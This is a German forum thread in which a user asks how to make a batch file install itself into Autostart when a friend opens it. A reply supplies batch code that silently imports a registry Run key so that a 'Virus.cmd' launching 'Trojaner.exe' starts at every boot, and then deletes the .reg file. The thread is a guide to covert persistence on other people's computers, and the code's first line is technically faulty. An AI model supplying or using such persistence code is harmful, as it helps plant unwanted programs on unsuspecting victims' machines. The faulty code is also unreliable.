.bat datei befehle !

Drachenmeister

Lt. Junior Grade
hallo
ich binn mir nicht sicher ob ich hier richtig binn mit meiner frage aber egal

ich habe meine .bat datei erstell und wollte dort einstellen das wenn man diese .bat datei öffnet der inhalt sich abspielt (das is ja kla) auch noch das sich diese datei selbst in den Autostart ordner Kopiert (dann sollte die ja bei jedem hochfahren automatisch starten)

wenn das möglich is wäre es nett mir vil auch zu erklären wie is das eingeben muss

mfg drache

irgendwie verstehe ich dein Problem nicht,

willst du wissen wie man ein Programm oder mehre Programme durch eine Batchdatei startet
oder
willst du wissen wie man es macht das es beim starten des BS automatisch mit startet?

MfG JackRipper

nein ich will wissen wie ich meiner batch datei sage das die datei sich kopieren soll wenn man sie öffnet

also wenn ich z.b meinem freund die datei schicke und der die öffnet das sich die datei automatisch in einen angegeben ordner(z.b autostart) oder so was kopiert

das kopieren geht zwar aber es ist einfacher wenn du einfach an dem angegebenem Ort einen neue Batch Datei erstellen lässt.
z.B.

Code:
start /wait Trojaner.exe >>%SystemDrive%\Programme\Virus.cmd
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>Eintrag.reg
echo "Virus"="\"%SystemDrive%\\Programme\\Virus.cmd\"">>Eintrag.reg
regedit /s Eintrag.reg
del Eintrag.reg

-damit wird ein Programm Namens Trojaner.exe in eine neue Datei Namens Virus.cmd eingetragen
-danach wird ein REG-Schlüssel erzeugt, die danach auch importiert wird, damit Virus.cmd immer automatisch gestartet wird.

also, damit wird jedesmal Virus.cmd ausgeführt welches dann ein anderes Programm oder Programme wie Trojaner.exe startet.

dies soll nur ein Beispiel sein, du musst natürlich es noch verfeinern und die Pfade anpassen , aber so etwa könnte es aussehen.

Zuletzt bearbeitet:
Zurück
Oben